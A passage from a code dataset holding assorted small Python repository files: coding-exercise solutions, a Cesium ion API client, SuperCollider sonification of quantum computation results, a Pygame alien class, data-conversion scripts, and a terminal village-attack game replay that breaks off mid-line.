([[\"0\", \"*\", \"0\"], [\"0\", \"*\", \"0\"], [\"*\", \"0\", \"*\"]], \"draw!\"),\n ([[\"-\", \"-\", \"o\"], [\"-\", \"o\", \"o\"], [\"x\", \"x\", \"x\"]], \"x wins!\"),\n ([[\"-\", \"-\", \"O\"], [\"-\", \"X\", \"O\"], [\"X\", \"O\", \"X\"]], \"unfinished!\"),\n]\n\nwrong_data = [\n ([[\"0\", \"*\", \"o\"], [\"0\", \"*\", \"0\"], [\"*\", \"0\", \"*\"]]),\n ([[\"-\", \"-\", \"o\"], [\"-\", \"o\", \"o\"], [\"x\", \"Xx\", \"x\"]]),\n ([[\"-\", \"1\", \"O\"], [\"z\", \"X\", \"R\"], [\"X\", \"b\", \"X\"]]),\n]\n\n\n@pytest.mark.parametrize(\"test_input, expected\", test_data)\ndef test_tic_tac_toe(test_input, expected):\n assert tic_tac_toe_checker(test_input) == expected\n\n\n@pytest.mark.parametrize(\"test_input\", wrong_data)\ndef test_tic_tac_toe_wrong_input(test_input):\n with pytest.raises(ValueError):\n tic_tac_toe_checker(test_input)\n","repo_name":"DmitriyReztsov/homework-repository","sub_path":"tests/homework07/test_hw3.py","file_name":"test_hw3.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28119645402","text":"import socket\n\ndef run_sockets(addr):\n\twith socket.socket() as s:\n\t\ts.connect(addr)\n\t\ts.sendall(b'hello world')\n\t\tdata = s.recv(1024)\n\t\tprint(data)\n\nfor i in range(7):\n\trun_sockets(('127.0.0.1',12345))\n\n\n","repo_name":"Touchfl0w/python_practices","sub_path":"advanced_grammer/practice21-30/practice24/p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42132285801","text":"class Solution:\n def gameOfLife(self, board: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n ROWS = len(board)\n COLUMS = len(board[0])\n directions = [[1, 0], [-1, 0], [0, 1], [0, -1],\n [1, 1], [-1, 1], [1, -1], [-1, -1]]\n copyboard = [[board[r][c] for c in range(ROWS)] for r in range(COLUMS)]\n\n for row in range(ROWS):\n for col in range(COLUMS):\n alive = 0\n for dr, dc in directions:\n r, c = row + dr, dc + col\n\n if r >= 0 and r < ROWS and c >= 0 and c < COLUMS and board[r][c] == 1:\n alive += 1\n\n if copyboard[row][col] == 1 and (alive < 2 or alive > 3):\n board[row][col] = 0\n if copyboard[row][col] == 0 and (alive >= 3):\n board[row][col] = 0\n","repo_name":"mdiallo98/python-dataStructures-Algos","sub_path":"QBank/game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"8355690940","text":"import logging\nfrom typing import Dict, Optional, Tuple\n\nfrom Exports.dtos import (\n ListExportsPathParams,\n ListExportsResponse,\n ExportAssetPathParams,\n ExportAssetRequest,\n ExportAssetResponse,\n GetExportStatusPathParams,\n GetExportStatusResponse,\n)\nfrom dtos import PaginationLinks\nfrom http_client import HTTPClientProtocol\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExportsApiClient:\n def __init__(self, http_client: HTTPClientProtocol):\n self._http_client = http_client\n\n async def list_exports(\n self, path_params: ListExportsPathParams\n ) -> Tuple[ListExportsResponse, Optional[PaginationLinks]]:\n endpoint_url = f\"/v1/assets/{path_params.asset_id}/exports\"\n status, response_body, headers = await self._http_client.get(\n endpoint=endpoint_url, headers={}\n )\n pagination_links = await self._retrieve_pagination_links(dict(headers))\n list_exports_response = ListExportsResponse.parse_obj(response_body)\n return list_exports_response, pagination_links\n\n async def _retrieve_pagination_links(\n self, headers: Dict\n ) -> Optional[PaginationLinks]:\n try:\n link_header = headers[\"Link\"]\n except KeyError:\n logging.debug(\"`Link` header is NOT present in the response.`\")\n pagination_links = None\n else:\n logging.debug(\"`Link` header is present in the response.`\")\n pagination_links = PaginationLinks.from_header(link_header)\n return pagination_links\n\n async def export_asset(\n self, path_params: ExportAssetPathParams, request_body_dto: ExportAssetRequest\n ) -> ExportAssetResponse:\n endpoint_url = f\"/v1/assets/{path_params.asset_id}/exports\"\n headers = {\"Content-type\": \"application/json\"}\n request_body = request_body_dto.dict()\n\n status, response_body, headers = await self._http_client.post(\n endpoint=endpoint_url, headers=headers, data=request_body\n )\n export_asset_response = ExportAssetResponse.parse_obj(response_body)\n return export_asset_response\n\n async def get_export_status(\n self, path_params: GetExportStatusPathParams\n ) -> GetExportStatusResponse:\n endpoint_url = (\n f\"/v1/assets/{path_params.asset_id}/exports/{path_params.export_id}\"\n )\n status, response_body, headers = await self._http_client.get(\n endpoint=endpoint_url, headers={}\n )\n get_export_status = GetExportStatusResponse.parse_obj(response_body)\n return get_export_status\n","repo_name":"geo-haiku/cesium-ion-api-client","sub_path":"src/Exports/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12932941057","text":"from sys import stdin\n\ninput = stdin.readline\nl = set()\nfor _ in range(int(input())):\n l.add(input().rstrip())\nl = list(l)\nl.sort()\nl.sort(key=len)\nprint(*l, sep=\"\\n\")\n","repo_name":"ombe1229/study","sub_path":"acmicpc/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37554621340","text":"from supercollider import Synth, Server, Group, AudioBus\nimport numpy as np\nimport time\n\n\nglobal NOTESDICT\nNOTESDICT = {\"c\":\"amp1\", \"c#\":\"amp2\", \"d\":\"amp3\", \"d#\":\"amp4\", \"e\":\"amp5\", \"f\":\"amp6\", \"f#\":\"amp7\", \"g\":\"amp8\", \"g#\":\"amp9\", \"a\":\"amp10\", \"a#\":\"amp11\", \"b\":\"amp12\", \"new\":\"amp13\"}\nglobal FREQDICT\nFREQDICT = {\"c\":60, \"c#\":61, \"d\":62, \"d#\":63, \"e\":64, \"f\":65, \"f#\":66, \"g\":67, \"g#\":68, \"a\":69, \"a#\":70, \"b\":71}\nglobal EXAMPLE\nEXAMPLE = {\"l1\":\"amp1\", \"l2\":\"amp2\", \"l3\":\"amp3\", \"l4\":\"amp4\", \"l5\":\"amp5\", \"l6\":\"amp6\", \"l7\":\"amp7\", \"l8\":\"amp8\"}\n\ndef note_loudness(qd): # Deprecated --------------------\n global server\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_model1_son1\", args)\n loudnesses = [loudness]\n for lqd in qd:\n loudness = np.zeros(12)\n for j, f in lqd.items():\n intj = int(j, 2)\n for i in range(12):\n trig= (intj >> i) & 1\n if trig:\n loudness[i] += f\n for i, amp in enumerate(loudness):\n synth.set(labels[i], amp)\n loudnesses.append(loudness)\n time.sleep(0.2)\n\n# Mapping #1 - Simple additive synthesis\ndef note_loudness_multiple(loudnessstream):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\", \"amp13\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_model1_son1\", args)\n\n for state in loudnessstream:\n print(state)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n time.sleep(0.03)\n# Mapping #1 - Simple additive synthesis\ndef note_loudness_multiple_8_qubits(loudnessstream):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"qubit_8\", args)\n\n for state in loudnessstream:\n print(state)\n for k, amp in state.items():\n synth.set(EXAMPLE[k], amp)\n time.sleep(0.03)\n\n# Mapping #5 - Atonal additive sysnthesis chords used in \"Rasgar, Saber\" (2023)\ndef note_loudness_multiple_rs(loudnessstream, expect_values):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_son3\", args)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n synth.set(\"shift\", expect_values[v])\n time.sleep(0.05)\n\n# Mapping #3 - Mel-Filterbank Spectral Diffusion\ndef mel_filterbank_loudness_multiple(loudnessstream, inbufnum=12):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n args[\"bufnum\"] = 0\n args[\"inbufnum\"] = inbufnum\n synth = Synth(server, \"mel_fb_dif1\", args)\n\n for state in loudnessstream:\n print(state)\n #synth.set(\"gate\", 1)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n #synth.set(\"gate\", 0)\n time.sleep(0.1)\n\n# Mapping #4 - Mel-Filterbank Spectral Diffusion with Pitchshift\ndef mel_filterbank_loudness_multiple_decoupled(loudnessstream, expect_values):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n args[\"bufnum\"] = 0\n args[\"inbufnum\"] = 12\n srcgroup = Group(server, action=1, target=1)\n fxgroup = Group(server, action=3, target=srcgroup.id)\n srcbus = AudioBus(server, 1)\n args[\"inbus\"] = srcbus.id\n synth = Synth(server, \"mel_fb_dif2\", args, target=fxgroup)\n #synth2 = Synth(server, \"input_signal2\", {\"bufnum\": 12, \"out\": srcbus.id}, target=srcgroup)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n print(f\" shifted value: {(expect_values[v] - min(expect_values))}\")\n #synth.set(\"gate\", 1)\n shifted_value = (expect_values[v] - min(expect_values))\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n sy = Synth(server, \"input_signal2\", {\"out\":srcbus.id}, target=srcgroup)\n #sy = Synth(server, \"input_signal3\", {\"bufnum\": 15, \"out\":srcbus.id, \"tgrate\":shifted_value}, target=srcgroup)\n #synth.set(\"gate\", 0)\n #time.sleep(0.3)\n\n# Mapping #2 - Pitchshifted Arpeggios instead of chords. Philip Glass vibes.\ndef note_cluster_intensity(loudnessstream, expect_values):\n global server\n\n for v, state in enumerate(loudnessstream):\n #print(state)\n sorted_state = dict(sorted(state.items(), key=lambda item: item[1]))\n print(sorted_state)\n print(f\" expected value: {expect_values[v]}\")\n print(f\" shifted value: {(expect_values[v] - min(expect_values))/100}\")\n shifted_value = (expect_values[v] - min(expect_values))/100\n for i, (k, amp) in enumerate(sorted_state.items()):\n sy = Synth(server, \"vqe_son2\", {\"note\": FREQDICT[k], \"amp\":amp})\n # sy = Synth(server, \"vqe_son2\", {\"note\": FREQDICT[k]+expect_values[v]-3, \"amp\":amp})\n time.sleep(0.005+shifted_value)\n #time.sleep(0.2)\n\n# Mapping #6 - Granular Synthesis Spatialization 4 qubits\ndef granular_triggers(loudnessstream, expect_values):\n global server\n\n\n labels = [\"s0\", \"s1\", \"s2\", \"s3\"]\n loudness = np.zeros(4)\n args = dict(zip(labels,loudness))\n\n synth = Synth(server, \"vqgrains\", args)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n print(f\" shifted value: {(expect_values[v] - min(expect_values))}\")\n shifted_value = (expect_values[v] - min(expect_values))\n #shifted_value = -(shifted_value - max(expect_values)) #Uncomment to change shift direction\n for k, amp in state.items():\n synth.set(k, amp)\n synth.set(\"rate\", shifted_value+0.01)\n time.sleep(0.1)\n\n\n# Function called by the main script\ndef sonify(loudnessstream, expect_values, son_type=1):\n \n global server\n\n server = Server()\n # Parse mapping type\n if son_type == 1:\n note_loudness_multiple(loudnessstream)\n elif son_type == 2:\n note_cluster_intensity(loudnessstream, expect_values)\n elif son_type == 3:\n mel_filterbank_loudness_multiple(loudnessstream, inbufnum=14)\n elif son_type == 4:\n mel_filterbank_loudness_multiple_decoupled(loudnessstream, expect_values)\n elif son_type == 5:\n note_loudness_multiple_rs(loudnessstream, expect_values)\n elif son_type == 6:\n granular_triggers(loudnessstream, expect_values)\n elif son_type == 7:\n note_loudness_multiple_8_qubits(loudnessstream)\n\n# Ctrl - . equivalent to kill sounds in SC\ndef freeall():\n global server\n\n server._send_msg(\"/g_freeAll\", 0)\n","repo_name":"iccmr-quantum/VQH","sub_path":"sc_functions.py","file_name":"sc_functions.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32437628109","text":"import requests\n\n\ndef download_image(url, filename):\n response = requests.get(url)\n with open(f\"./images/{filename}\", \"wb\") as f:\n f.write(response.content)\n\n\ndef fetch_spacex_last_launch():\n url = \"https://api.spacexdata.com/v3/launches/latest\"\n spacex_response = requests.get(url)\n spacex_json = spacex_response.json()\n spacex_image_links = spacex_json[\"links\"][\"flickr_images\"]\n for picture_number, link in enumerate(spacex_image_links):\n spacex_picture_filename = f\"spacex{picture_number + 1}.jpg\"\n download_image(link, spacex_picture_filename)\n","repo_name":"tumkir/Space_Instagram","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"736715259","text":"\"\"\"Class Alien\"\"\"\n\nimport pygame\nfrom pygame.sprite import Sprite\n\nimport os\n\n\nclass Alien(Sprite):\n \"\"\"Клас для керування космічним прибулцем.\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"Ініціалізація прибульця та його початкового положення\"\"\"\n super().__init__()\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n\n # NOTE: Завантаження зображення корабля\n # image = pygame.image.load('images/alien_ship.png')\n\n resource_path = os.path.dirname(__file__)\n image_path = os.path.join(resource_path, 'images')\n image = pygame.image.load(os.path.join(image_path, 'alien_ship.png'))\n\n image = pygame.transform.scale(image, (46, 42))\n\n self.image = image\n self.rect = self.image.get_rect()\n\n # NOTE: Створення кожного нового корабля внизу по центру екрану\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n # NOTE: Збереження десяткового значення позиції корабля по горизонталі\n self.x = float(self.rect.x)\n\n def check_edges(self):\n \"\"\"\"Перевірка на досягнення краю екрана\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right or self.rect.left <= 0:\n return True\n\n def update(self):\n \"\"\"Зміщення космічного корабля прибульця\"\"\"\n self.x += (self.settings.alien_speed *\n self.settings.fleet_direction)\n self.rect.x = self.x\n","repo_name":"Mellow88/Python_crash_course","sub_path":"alien_invasion/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9050122422","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport glob\nfrom tqdm import tqdm\n\ndef tf2npz(tf_path, export_folder='C:\\\\data\\\\test'):\n vid_ids = []\n labels = []\n mean_rgb = []\n mean_audio = []\n tf_basename = os.path.basename(tf_path)\n npz_basename = tf_basename[:-len('.tfrecord')] + '.npz'\n isTrain = '/test' not in tf_path\n\n for example in tf.python_io.tf_record_iterator(tf_path): \n tf_example = tf.train.Example.FromString(example).features\n vid_ids.append(tf_example.feature['video_id'].bytes_list.value[0].decode(encoding='UTF-8'))\n if isTrain:\n labels.append(np.array(tf_example.feature['labels'].int64_list.value))\n mean_rgb.append(np.array(tf_example.feature['mean_rgb'].float_list.value).astype(np.float16))\n mean_audio.append(np.array(tf_example.feature['mean_audio'].float_list.value).astype(np.float16))\n \n save_path = export_folder + '/' + npz_basename\n np.savez(save_path, \n rgb=np.array(mean_rgb), \n audio=np.array(mean_audio), \n ids=np.array(vid_ids),\n labels=labels\n )\n\nif __name__ == '__main__':\n from multiprocessing import Pool\n with Pool() as p:\n p.map(tf2npz, glob.glob('../input/test/*.tfrecord'))\n","repo_name":"mifril/kaggle_youtube_8m","sub_path":"yt8m_2017/tf2npz.py","file_name":"tf2npz.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37138534916","text":"import sys\nN, total = map(int, sys.stdin.readline().rstrip().split())\ncoin = [int(sys.stdin.readline().rstrip()) for _ in range(N)]\n\ncount = 0\nwhile total: # total 이 0미만 일때까지 반복\n if coin[-1] > total: # 가지고 있는 가장 큰 금액이 total보다 크면 그돈은 뺌\n coin.pop()\n else:\n count += total // coin[-1] # 아닌경우 total을 가장큰 금액 단위로 나눠줌\n total = total % coin[-1] # 몫은 동전 개수(count)이고 나머지는 total\n coin.pop() # 가진 동전 목록에서 빼줌\n\nprint(count)\n","repo_name":"wony5248/Daily_Study","sub_path":"Coding_Study/03-10/백준 11047 동전0 - greedy.py","file_name":"백준 11047 동전0 - greedy.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"4864326400","text":"from typing import Optional\n\nfrom torch import Tensor\nfrom yacs.config import CfgNode\n\nfrom SCT.datasets import GeneralDataset\nfrom SCT.evaluators import GeneralEvaluator\nfrom SCT.experiment.general_experiment import GeneralExperiment\nfrom SCT.models import GeneralModel\n\n\ndef make_experiment(\n cfg: CfgNode,\n dataset: GeneralDataset,\n model: GeneralModel,\n loss_weights: Tensor,\n val_evaluator: Optional[GeneralEvaluator],\n train_evaluator: Optional[GeneralEvaluator],\n) -> GeneralExperiment:\n training_name = cfg.training.name\n if training_name == \"normal\":\n return GeneralExperiment(\n cfg,\n dataset,\n model,\n loss_weights,\n val_evaluator=val_evaluator,\n train_evaluator=train_evaluator,\n )\n else:\n raise Exception(\"Invalid training name (%s)\" % training_name)\n","repo_name":"MohsenFayyaz89/SCT","sub_path":"src/SCT/experiment/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"81"} +{"seq_id":"6921807875","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nn = int(input())\nfor k in range(1, n+1):\n a1 = k*k\n a2 = a1 * (a1-1)//2\n if a2 > 2:\n a2 -= 4 * (k-1) * (k-2)\n print(a2)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"karan-ksrk/CSES-Problem-Set","sub_path":"007 Two Knights.py","file_name":"007 Two Knights.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12435253474","text":"'''\nEXERCÍCIO 24 - Faça um programa que simule uma calculadora. Devem ser efetuadas apenas operações de soma, subtração, multiplicação e divisão. O programa deve ler dois valores (operandos) e a operação a ser efetuada. Após o cálculo, o programa apresenta a resposta na tela.\n'''\n\nvalor1 = float(input('Digite o primeiro valor: '))\nvalor2 = float(input('Digite o segundo valor: '))\n\nprint('\\nOperações possíveis: \\nSOMA (+) \\nSUBTRAÇÃO (-) \\nMULTIPLICAÇÃO (*) \\nDIVISÃO (/)')\n\noperacao = input('\\nDigite o símbolo correspondente a operação que se deseja realizar: ')\n\nif operacao == '+' :\n resultado = valor1 + valor2\n print(f'\\nO resultado dessa soma é {resultado:.2f}.')\nelif operacao == '-' :\n resultado = valor1 - valor2\n print(f'\\nO resultado dessa subtração é {resultado:.2f}.')\nelif operacao == '*' :\n resultado = valor1 * valor2\n print(f'\\nO resultado dessa multiplicação é {resultado:.2f}.')\nelif operacao == '/' :\n resultado = valor1 / valor2\n print(f'\\nO resultado dessa divisão é {resultado:.2f}.')\nelse:\n print('\\nNão é possível realizar essa operação!')","repo_name":"joycecampelos/exercicios_python","sub_path":"exercicio24.py","file_name":"exercicio24.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73540123785","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .serializers import *\n# Create your views here.\n\ndef home(request):\n return render(request,'home.html')\n\ndef download(request, uid):\n return render(request,'download.html',context = {'uid':uid})\n\n# class HandleFileUpload(APIView):\n# def post(self,request):\n# try:\n# data = request.data\n# serializer = FileListSerializer(data=data)\n# if serializer.is_valid():\n# serializer.save()\n# print(serializer.data)\n# return Response({\n# 'status':200,\n# 'message':'files uploaded successfully',\n# 'data' : serializer.data\n# })\n\n# return Response({\n# 'status': 400,\n# 'message':'something went wrong',\n# 'data':serializer.errors\n# })\n# except Exception as e:\n# print(\"asish\",e)\n\nclass HandleFileUpload(APIView):\n def post(self, request):\n try:\n data = request.data\n serializer = FileListSerializer(data=data)\n if serializer.is_valid():\n folder = serializer.create(serializer.validated_data)['folder']\n return Response({\n 'status': 200,\n 'message': 'files uploaded successfully',\n 'data': {'folder': folder}\n })\n return Response({\n 'status': 400,\n 'message': 'something went wrong',\n 'data': serializer.errors\n })\n except Exception as e:\n print(\"asish\", e)\n","repo_name":"Asish-T-Babu/file_share","sub_path":"fileupload/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30253060369","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\nfrom account.form import ProfileForm\nfrom common.views import HomeView\n\nadmin.autodiscover()\nimport settings\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='discussion/discussions/default/inbox'), name='home'),\n url(r'^accounts/login/', 'account.views.login'),\n url(r'^accounts/logout/?$', 'django.contrib.auth.views.logout_then_login', name='logout'),\n url(r'^user/register/$', 'account.views.register'),\n url(r'^discussion/', include('discussion.urls')),\n url(r'^tag/', include('tags.urls')),\n url(r'^notifications/', include('notification.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^selectable/', include('selectable.urls')),\n url('^profiles/edit', 'profiles.views.edit_profile', {'form_class': ProfileForm}),\n url(r'^profiles/', include('profiles.urls')),\n)\n","repo_name":"vtemian/aisec","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"35289391348","text":"from django import template\nfrom subprocess import Popen, PIPE\nfrom bs4 import BeautifulSoup\n\ntry:\n unicode_type = unicode\nexcept NameError:\n unicode_type = str\n\nregister = template.Library()\n\n@register.filter\ndef html2text(value):\n \"\"\"\n Pipes given HTML string into the text browser W3M, which renders it.\n Rendered text is grabbed from STDOUT and returned.\n \"\"\"\n try:\n cmd = \"w3m -dump -T text/html -O utf-8\"\n proc = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, universal_newlines=True)\n return proc.communicate(str(value))[0]\n except OSError:\n # something bad happened, so just return the input\n return value\n\n@register.filter\ndef extract_urllinks(value, template='%(text)s (%(url)s)'):\n '''\n Extract urls from links and put it to brackets after links. Useful for generating plain version of email body from html\n '''\n html = BeautifulSoup(value)\n for link in html.findAll('a'):\n text = ''.join(map(unicode_type, link.contents)).strip()\n if link.get('href') and link.get('href') != text:\n result = template % {\n 'text': text,\n 'url': link['href'].replace('\\n',''),\n }\n elif text:\n result = text\n\n link.replaceWith(result)\n return html\n","repo_name":"ramusus/django-email-html","sub_path":"email_html/templatetags/email_html.py","file_name":"email_html.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"23090477898","text":"from os.path import exists\nimport sys\nsys.path.insert(0, './src')\nfrom input import input_to, Get\nfrom village import Village\nimport time\nfrom game_constants import *\n\nt=0\n\nf_exist = exists(\"./replays/moves.txt\")\nif(not f_exist):\n print(\"No replays available!\")\n exit()\n\nf = open(\"./replays/moves.txt\", \"r\")\ntime_line = f.readline().strip()\nchar_flag = int(f.readline().strip())\n\nv1 = Village(VILLAGE_ROWS, VILLAGE_COLS, char_flag)\nv1.printVillage(t)\nprint(\"\\n\\n\")\n\nflag=0\n\nqueen_big_attack_flag = 0\n\nwhile(1):\n t+=1\n if(flag==0):\n time_line = f.readline().strip()\n if(time_line==\"\"):\n if(v1.game_end(t)==1):\n break\n else:\n print(\"Huh?\")\n break\n\n inps = input_to(Get) # This is here so as to prevent replay from instantly taking input\n if(t!=int(time_line)):\n flag = 1\n continue\n flag = 0\n \n inp = f.readline().strip()\n if(inp==\"\"):\n inp = ' '\n if(inp=='q'):\n break\n if(v1.game_end(t)==1):\n break\n\n if(queen_big_attack_flag==1):\n queen_big_attack_flag = 0\n v1.queen_attack(16, 9)\n\n if(v1.player.rage==1 and t-v1.player.prev_rage_time>=100):\n v1.player.rage = 0\n v1.player.prev_rage_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n\n if(inp=='w' or inp=='s' or inp=='a' or inp=='d'):\n v1.player.move(inp)\n v1.player.prev_inp = inp\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp==' '):\n if(char_flag==0):\n v1.king_attack()\n elif(char_flag==1):\n v1.queen_attack(8, 5)\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='b'):\n if(char_flag==0):\n v1.king_big_attack()\n elif(char_flag==1):\n queen_big_attack_flag = 1\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='r' and char_flag==0):\n if(t-v1.player.prev_rage_time>=100):\n v1.player.rage = 1\n v1.player.prev_rage_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='h' and char_flag==0):\n if(t-v1.player.prev_heal_time>=100):\n v1.player.hp = int(v1.player.hp*1.5)\n if(v1.player.hp>KING_HEALTH):\n v1.player.hp = KING_HEALTH\n for barbarian in v1.barbarians:\n barbarian.hp = int(barbarian.hp*1.5)\n if(barbarian.hp>BARBARIAN_HEALTH):\n barbarian.hp = BARBARIAN_HEALTH\n v1.player.prev_heal_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='1' or inp=='2' or inp=='3'):\n v1.spawn_barbarian(int(inp))\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='4' or inp=='5' or inp=='6'):\n v1.spawn_archer(int(inp)-3)\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='7' or inp=='8' or inp=='9'):\n v1.spawn_balloon(int(inp)-6)\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='k'):\n for i in range(20):\n v1.player.hp -= 10\n v1.printVillage(t)\n print(\"\\n\\n\")\n time.sleep(1)\n if(inp=='u'):\n v1.printVillage(t)\n print(\"\\n\\n\")\n v1.canon_attack()\n v1.wizard_attack()\n \n i=0\n lim=2\n if(v1.player.rage==0):\n lim=1\n for i in range(lim):\n for barbarian in v1.barbarians:\n if(barbarian.hp<=0):\n continue\n if(barbarian.min_distance_object==None):\n v1.barbarian_target_set(barbarian)\n if(barbarian.target != (-1, -1)):\n v1.barbarian_target_set(barbarian)\n if(barbarian.target[0]>0):\n v1.barbarian_move(barbarian, 1,0)\n barbarian.target = (barbarian.target[0]-1, barbarian.target[1])\n elif(barbarian.target[0]<0):\n v1.barbarian_move(barbarian, -1,0)\n barbarian.target = (barbarian.target[0]+1, barbarian.target[1])\n elif(barbarian.target[1]>0):\n v1.barbarian_move(barbarian, 0,1)\n barbarian.target = (barbarian.target[0], barbarian.target[1]-1)\n elif(barbarian.target[1]<0):\n v1.barbarian_move(barbarian, 0,-1)\n barbarian.target = (barbarian.target[0], barbarian.target[1]+1)\n if(barbarian.target==(0,0)):\n barbarian.target = (-1, -1)\n v1.printVillage(t)\n \n elif(barbarian.min_distance_object != None):\n barbarian.min_distance_object.hp -= BARBARIAN_DAMAGE\n if(barbarian.min_distance_object.hp<=0):\n barbarian.min_distance_object = None\n v1.barbarian_target_set(barbarian)\n\n for archer in v1.archers:\n if(archer.hp<=0):\n continue\n if(archer.min_distance_object==None):\n v1.archer_target_set(archer)\n if(archer.target != (-1, -1)):\n v1.archer_target_set(archer)\n if(archer.target[0]>8):\n v1.archer_move(archer, 2,0)\n archer.target = (archer.target[0]-2, archer.target[1])\n elif(archer.target[0]<-8):\n v1.archer_move(archer, -2,0)\n archer.target = (archer.target[0]+2, archer.target[1])\n elif(archer.target[1]>8):\n v1.archer_move(archer, 0,2)\n archer.target = (archer.target[0], archer.target[1]-2)\n elif(archer.target[1]<-8):\n v1.archer_move(archer, 0,-2)\n archer.target = (archer.target[0], archer.target[1]+2)\n if(archer.target<=(8,8) and archer.target>=(-8,-8)):\n archer.target = (-1, -1)\n v1.printVillage(t)\n \n elif(archer.min_distance_object != None):\n archer.min_distance_object.hp 